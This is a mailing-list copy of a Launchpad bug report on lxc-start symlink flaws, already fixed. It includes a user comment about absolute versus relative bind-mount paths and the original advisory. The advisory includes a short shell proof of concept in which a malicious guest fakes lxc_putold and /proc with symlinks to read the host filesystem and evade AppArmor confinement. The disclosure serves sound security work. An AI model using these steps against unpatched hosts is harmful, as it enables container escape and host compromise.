touch-packages team mailing list archive

Thread
Date

[Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

To: touch-packages@xxxxxxxxxxxxxxxxxxx
From: Stephen Gaito <stephen@xxxxxxxxxxxxxxxxx>
Date: Wed, 30 Sep 2015 09:56:35 -0000
Reply-to: Bug 1476662 <1476662@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Looking through the top Google results on how to bind-mount a directory
from the host-server into the lxc-server I notice that:

* Stéphane Graber's "LXC 1.0: Advanced container usage [3/10]" post (
https://www.stgraber.org/2013/12/21/lxc-1-0-advanced-container-usage/ )
makes use of the **relative** mount point (in the lxc-server's fstab
config file on the host-server)

* Unfortunately the **official**(?) Debian LXC wiki page on "LXC" has
the topic "Bind mounts inside the container" (
https://wiki.debian.org/LXC#Bind_mounts_inside_the_container ) which
uses the lxc.mount.entry line in the config file **and** makes use of an
**absolute** mount point.

So those following the official Debian LXC documentation will be caught
by this security patch. ;-(

Just to be definite: changing all lxc.mount.entry mount points to
**relative** paths is a current workaround.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662

Title:
  lxc-start symlink vulnerabilities may allow guest to read host
  filesystem, interfere with apparmor

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  lxc-start shuffles around mounts using helper directory
  /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)

  It then modifies mounts operating in guest root directory before
  invoking init. As it does not check if all mount points are
  directories, a malicious guest may modify its internal structure
  before shutdown (or was created using manipulated image) and then when
  started again, guest may

  * Access  the whole host root filesystem

  * Block switching from lxc-start apparmor profile to lxc-container-
  default

  
  # Real putold before pivot-root (root fs will end here)
  mkdir -p /x/lxc_putold

  # Faked putold
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
  touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts

  
  # proc fake
  mkdir -p /x/proc
  umount /proc
  rmdir /proc
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc

  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status


  The  issue was also found during
  https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions